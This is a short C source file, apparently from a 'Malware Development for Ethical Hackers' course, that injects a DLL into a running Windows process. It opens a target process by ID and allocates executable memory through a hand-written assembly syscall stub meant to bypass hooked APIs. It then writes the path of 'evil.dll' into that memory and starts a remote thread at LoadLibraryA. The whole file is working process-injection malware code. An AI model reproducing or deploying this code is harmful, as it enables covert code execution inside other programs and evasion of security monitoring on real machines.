/*
 * Malware Development for Ethical Hackers
 * hack2.c
 * system call through assembly
 * author: @cocomelonc
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>

char maliciousLibraryPath[] = "C:\\temp\\evil.dll";
unsigned int maliciousLibraryPathLength = sizeof(maliciousLibraryPath) + 1;

extern "C" NTSTATUS myNtAllocateVirtualMemory(
    HANDLE             ProcessHandle,
    PVOID              *BaseAddress,
    ULONG              ZeroBits,
    PULONG             RegionSize,
    ULONG              AllocationType,
    ULONG              Protect
);

int main(int argc, char* argv[]) {
  HANDLE targetProcess; // Handle to the target process
  HANDLE remoteThread;  // Remote thread
  LPVOID remoteBuffer;  // Remote buffer for data

  // Get the handle to Kernel32 and obtain function pointer
  HMODULE kernel32Handle = GetModuleHandle("Kernel32");
  VOID *loadLibraryFunction = (VOID*)GetProcAddress(kernel32Handle, "LoadLibraryA");

  // Parse the process ID
  if (atoi(argv[1]) == 0) {
    printf("Process ID not found. Exiting...\n");
    return -1;
  }
  printf("Process ID: %i", atoi(argv[1]));
  targetProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, DWORD(atoi(argv[1])));

  myNtAllocateVirtualMemory(targetProcess, &remoteBuffer, 0, (PULONG)&maliciousLibraryPathLength, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

  // Inject the malicious DLL into the target process
  WriteProcessMemory(targetProcess, remoteBuffer, maliciousLibraryPath, maliciousLibraryPathLength, NULL);

  // Start a new thread in the target process
  remoteThread = CreateRemoteThread(targetProcess, NULL, 0, (LPTHREAD_START_ROUTINE)loadLibraryFunction, remoteBuffer, 0, NULL);
  CloseHandle(targetProcess);
  return 0;
}